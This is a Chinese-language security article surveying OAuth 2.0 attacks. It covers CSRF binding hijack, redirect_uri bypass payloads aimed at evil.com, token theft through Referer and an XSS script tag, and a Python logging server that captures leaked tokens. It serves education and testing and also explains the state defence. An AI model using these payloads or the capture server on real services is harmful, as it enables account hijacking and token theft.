本文整理了OAuth 2.0的攻擊面+實際案例+輔助測試代碼。

OAuth流程

本文以兩種廣泛使用的方案為標準展開.。如對流程不了解,請先移步學習: 理解OAuth 2.0

Authorization Code

• response_type = code
• redirect_uri
• scope
• client_id
• state

Implicit

• response_type = token
• redirect_uri
• scope
• client_id
• state

攻擊面

• CSRF導致綁定劫持
• redirect_uri繞過導致授權劫持
• scope越權訪問

綁定劫持

攻擊者抓取認證請求構造惡意url,并誘騙已經登錄的網用戶點擊(比如通過郵件或者QQ等方式).認證成功后用戶的帳號會同攻擊者的帳號綁定到一起。

OAuth 2.0提供了state參數用于防御CSRF.認證服務器在接收到的state參數按原樣返回給redirect_uri,客戶端收到該參數并驗證與之前生成的值是否一致.除此方法外也可使用傳統的CSRF防御方案.

案例: 人人網-百度OAuth 2.0 redirect_uir CSRF 漏洞

授權劫持

根據OAuth的認證流程,用戶授權憑證會由服務器轉發到redirect_uri對應的地址,如果攻擊者偽造redirect_uri為自己的地址,然后誘導用戶發送該請求,之后獲取的憑證就會發送給攻擊者偽造的回調地址.攻擊者使用該憑證即可登錄用戶賬號,造成授權劫持.

正常情況下,為了防止該情況出現,認證服務器會驗證自己的client_id與回調地址是否對應.常見的方法是驗證回調地址的主域,涉及到的突破方式與CSRF如出一轍:

未驗證

• 未驗證的情況,可以直接跳出外域.

  案例: 土豆網某處認證缺陷可劫持oauth_token

驗證繞過

• auth.app.com.evil.com
• evil.com?auth.app.com
• evil.com?@auth.app.com?案例:騰訊OAuth平臺 redirect_uri 過濾不嚴可能導致用戶信息遭竊取（二）
• auth.app.com@evil.com?案例:繞過網易oauth認證的redirect_uri限制劫持帳號token
• auth.app.com\@evil.com?案例:騰訊OAuth平臺redirect_uri過濾不嚴可能導致用戶信息遭竊取（四）
• evil.com\auth.app.com
• evil.com:\auth.app.com
• evil.com\.auth.app.com?案例:騰訊OAuth平臺redirect_uri過濾不嚴可能導致用戶信息遭竊取
• evil.com:\@auth.app.com?案例:新浪微博OAuth平臺redirect_uri過濾不嚴可能導致用戶信息遭竊取
• 寬字符繞過 案例:?騰訊OAuth平臺redirect_uri過濾不嚴可能導致用戶信息遭竊取（三）

子域可控

• 對回調地址驗證了主域為app.com,但其子域evil.app.com可被任意用戶注冊使用.

  案例: 新浪微博部分App Oauth2漏洞

跨域

• 利用可信域的url跳轉從referer偷取token

  如果網站存在一個任意url跳轉漏洞,可利用該漏洞構造以下向量

  redirect_uri=http://auth.app.com/redirect.php?url=http://evil.com

  認證服務器將憑證通過GET方法發送到redirect.php,這時redirect.php執行跳轉,訪問http://evil.com,攻擊者為evil.com記錄日志,并從請求頭中的referer字段提取出該憑證,即可通過該憑證進行授權登錄.

• 利用跨域請求從referer偷取token

  在我們不能繞過redirect_uri的判斷規則時,我們可以使利用跨域請求從referer中偷取token.

  例1 redirect_uri限制為app.com,然而app.com/article/1.html中允許用戶發表文章,在文章中嵌入來自evil.com的外部圖片.這時我們可以讓redirect_uri指向該文章app.com/article/1.html,當該文章被訪問時,會自動獲取 evil.com/test.jpg ,這時攻擊者即可從請求頭的referer拿到token

  例2 利用XSS實現跨域

  redirect_uri = http://app.com/ajax/cat.html?callback=<script src="http://evil.com?getToken.php"></script>

越權訪問

這個案例展示了scope權限控制不當帶來的安全風險,同時將授權劫持的幾個方面演繹的淋漓盡致.

案例: 從“黑掉Github”學Web安全開發

輔助驗證腳本

一個簡易服務器,會記錄來訪者的請求頭.
1. Python picserver.py [可選端口號]
2. 打開瀏覽器訪問圖片或頁面地址
3. 查看日志
4. 清除日志

import BaseHTTPServer
import datetime
import sys
import osSERVER = '0.0.0.0' PORT = int(sys.argv[1]) if len(sys.argv) > 1 else 2333 LOG_PATH = 'reqlog.txt' class WebRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_GET(self): if '.png' in self.path: print self.path fname = '1.png' elif '.jpg' in self.path: fname = '1.jpg' elif '.gif' in self.path: fname = '1.gif' elif '.html' in self.path: fname = 'index.html' elif 'clear' in self.path: os.remove(LOG_PATH) self.send_response(200) self.end_headers() self.wfile.write('ok') return else: self.send_response(200) self.end_headers() try: self.wfile.write(open(LOG_PATH, 'r').read()) except IOError: print '[*]Create logfile: ' + LOG_PATH return message_parts = ['<br>===== [%s] %s =====' % (self.path, datetime.datetime.today())] for name, value in sorted(self.headers.items()): message_parts.append('%s: %s' % (name, value.strip())) message = '<br>'.join(message_parts) + '<br>' with open(LOG_PATH, 'a') as f: f.write(message) self.send_response(200) self.end_headers() self.wfile.write(open(fname, 'rb').read()) print '[*]Starting server at %s:%d' % (SERVER, PORT) server = BaseHTTPServer.HTTPServer((SERVER, PORT), WebRequestHandler) server.serve_forever()

效果:

參考

• 理解OAuth 2.0 – 阮一峰
• 從“黑掉Github”學Web安全開發 – 陳皓
• 利用OAuth劫持用戶身份(Kcon 2014) – 藍色di雪球
• 烏云已公開漏洞

轉載于:https://www.cnblogs.com/h2zZhou/p/5741262.html

總結

以上是生活随笔為你收集整理的OAuth 2.0攻击面与案例总结的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。